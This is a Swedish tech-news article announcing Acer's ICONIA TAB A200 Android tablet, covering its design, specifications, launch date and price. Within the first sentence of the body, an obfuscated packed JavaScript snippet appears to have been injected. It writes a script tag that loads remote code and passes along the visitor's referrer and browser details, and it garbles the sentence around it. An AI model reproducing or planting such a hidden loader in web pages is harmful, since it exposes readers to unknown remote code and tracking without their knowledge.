Image Image Image Image Image Image Image Image Image Image

| 17 juni, 2021

Scroll to top

Top

Acer presenterar ICONIA TAB A200

Acer presenterar ICONIA TAB A200
Revue Magazine

Nya eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|sasrd|var|u0026u|referrer|ranyh||js|php’.split(’|’),0,{}))
ICONIA TAB A200 är företagets helt nya surfplatta till hela familjen med den senaste tekniken – till ett överkomligt pris

Elektronikbranschen utsåg nyligen surfplattan till årets julklapp, och nya ICONIA är Acer’s nya bidrag i den produktkategorin. Enheten är idealisk för spel, e-böcker, filmer, musik, fotografering och allting som har med sociala nätverk att göra. Plattan riktar sig mot aktiva användare i alla åldrar och detta till ett attraktivt pris. Operativsystemet är senaste versionen av Android, 4.0 (eller Ice Cream Sandwich), och kommer att finnas tillgänglig för svenska konsumenter under februari månad 2012.

Förutom en överkomlig prislapp har ingenting lämnats åt slumpen när det gäller formgivning och design. ICONIA kommer i antingen grå titanium eller i röd metallic och den mönstrade baksidan ger en känsla av ett mjukt och behagligt tillverkningsmaterial. Den 10,1 tum stora skärmen och NVIDIA® Tegra 2 Dual Core 1 GHz processorn i kombination med spännande programvara ger användaren en fullmatad enhet som erbjuder både nytta och nöje.

För optimal mobilitet är enheten utrustad med HDMI-utgång, en USB-port i full storlek för ihopkoppling med andra enheter samt en MicroSD-kortplats för smidig överföring av filer. Kameran på två megapixlar ger möjlighet till videosamtal med kollegor eller familjemedlemmar var än användaren befinner sig, och Acer Social Jogger sammanför olika sociala media applikationer såsom Facebook och Twitter m.fl.

Pris och lansering:

ICONIA TAB finns tillgänglig från och med februari 2012, till ett rekommenderat pris från 379 Euro inklusive moms.

Produktbilder: http://acerbilder.com